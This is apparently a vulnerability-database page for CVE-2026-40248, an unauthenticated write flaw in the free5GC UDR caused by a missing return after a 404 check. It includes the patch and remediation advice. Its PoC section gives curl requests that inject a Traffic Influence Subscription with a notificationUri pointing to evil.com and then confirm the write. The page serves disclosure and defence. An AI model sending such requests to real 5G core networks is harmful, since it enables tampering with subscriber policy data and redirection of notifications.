CVE-2026-40248
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Summary
An improper path validation vulnerability in the UDR service allows any unauthenticated attacker with access to the 5G Service Based Interface (SBI) to create or overwrite Traffic Influence Subscriptions by supplying an arbitrary value in place of the expected subs-to-notify path segment.
Details
The endpoint PUT /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} is intended to only operate on Traffic Influence Subscription resources when influenceId is exactly subs-to-notify.
In the free5GC UDR implementation, the path validation is present but ineffective because the handler does not return after sending the HTTP 404 response. The request handling flow is:
- The function
HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdPutin./free5gc_4-2-1/free5gc/NFs/udr/internal/sbi/api_datarepository.gochecks whetherinfluenceId != "subs-to-notify". - If the value is different, it calls
c.String(http.StatusNotFound, "404 page not found"), but it does not return afterwards. - Execution continues, the request body is still parsed, and the handler calls
s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdPutProcedure(c, subscriptionId, &trafficInfluSub). - The processor creates or updates the subscription identified by
subscriptionIdeven though the path is invalid and the request should have been rejected.
As a result, an attacker can send a request to an invalid path, receive an apparent 404 page not found response, and still successfully create or modify the target subscription in the UDR.
The missing return after sending the 404 response in api_datarepository.go is the root cause of this vulnerability.
PoC
No authentication is required. The attacker can choose an arbitrary subscriptionId.
curl -v -X PUT "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/nuovoid" \
-H "Content-Type: application/json" \
-d '{
"notificationUri":"http://evil.com",
"dnns":["internet"],
"supis":["imsi-999999999999999"]
}'Response:
HTTP/1.1 404 Not Found
404 page not found{"dnns":["internet"],"supis":["imsi-999999999999999"],"notificationUri":"http://evil.com"}Now verify that the object was actually written:
curl -v "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/nuovoid"Response:
{"dnns":["internet"],"supis":["imsi-999999999999999"],"notificationUri":"http://evil.com"}Impact
This is an unauthenticated unauthorized write vulnerability. Any attacker with network access to the SBI can create or overwrite Traffic Influence Subscriptions by choosing an arbitrary subscriptionId, even when using an invalid path that should have been rejected.
This allows injection of attacker-controlled subscription data, including arbitrary SUPIs and attacker-controlled notificationUri values. Depending on deployment behavior, this may enable malicious redirection of policy-related notifications, corruption of subscription state, or disruption of legitimate network policy logic.
The attack is also difficult to detect because the API returns a misleading 404 Not Found response even when the write operation is actually performed.
Impacted deployments: any free5GC instance where the SBI is reachable by untrusted parties (e.g., misconfigured network segmentation, rogue NF, or compromised internal host).
Patch
The vulnerability has been confirmed patched by adding the missing return statement in NFs/udr/internal/sbi/api_datarepository.go, function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdPut:
if influenceId != "subs-to-notify" {
c.String(http.StatusNotFound, "404 page not found")
return
}With the patch applied, requests using an invalid influenceId now correctly return HTTP 404 and do not create or modify subscription data.
AnalysisAI
Unauthenticated attackers with network access to the free5GC UDR service's 5G Service Based Interface can create or overwrite Traffic Influence Subscriptions due to missing return statement after path validation. The vulnerability affects free5GC UDR versions prior to the patch (commit in GHSA-jgq2-qv8v-5cmj), allowing arbitrary subscription injection with attacker-controlled notification URIs and SUPI values while receiving misleading 404 responses. Public exploit code exists in the form of a d
Technical ContextAI
The vulnerability exists in the free5GC User Data Repository (UDR) Network Function, specifically in the HTTP request handler for Traffic Influence Subscription management. The affected endpoint PUT /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} implements path validation to ensure the influenceId parameter equals 'subs-to-notify' before processing subscription operations. The handler function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdPut in api_datarepository.go performs this check and sends an HTTP 404 response for invalid paths, but fails to return execution flow control. This missing return statement allows the request processing to continue into ApplicationDataInfluenceDataSubsToNotifySubscriptionIdPutProcedure, which parses the JSON body and persists the subscription data to the UDR database. The root cause is classified as CWE-285 (Improper Authorization), though it also exhibits characteristics of improper error handling. The free5GC project is a Go-based open-source implementation of 3GPP Release 15 5G core network functions, and the UDR component is responsible for storing and managing subscriber and policy data accessed via RESTful HTTP/2 interfaces on the Service Based Architecture.
RemediationAI
Apply the vendor-released patch documented in GitHub Security Advisory GHSA-jgq2-qv8v-5cmj available at https://github.com/free5gc/free5gc/security/advisories/GHSA-jgq2-qv8v-5cmj. The fix requires adding a single return statement after the 404 response in the HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdPut function in NFs/udr/internal/sbi/api_datarepository.go, changing the validation block to: if influenceId != "subs-to-notify" { c.String(http.StatusNotFound, "404 page not found"); return }. Organizations should update to the patched version of free5GC UDR from the official repository and rebuild affected Network Functions. As an immediate compensatory control while patching, implement network segmentation to restrict SBI access exclusively to authenticated and authorized 5G Network Functions, deploy firewall rules blocking untrusted access to UDR TCP ports (typically 8000 or custom configured), and enable SBI authentication mechanisms if supported by the deployment's NRF and AUSF components. Post-remediation, audit existing Traffic Influence Subscription data via GET requests to /nudr-dr/v2/application-data/influenceData/subs-to-notify/ endpoints to identify any unauthorized subscriptions created during the vulnerability window, particularly those with unexpected notificationUri values or SUPI ranges.
Same weakness CWE-285 – Improper Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-jgq2-qv8v-5cmj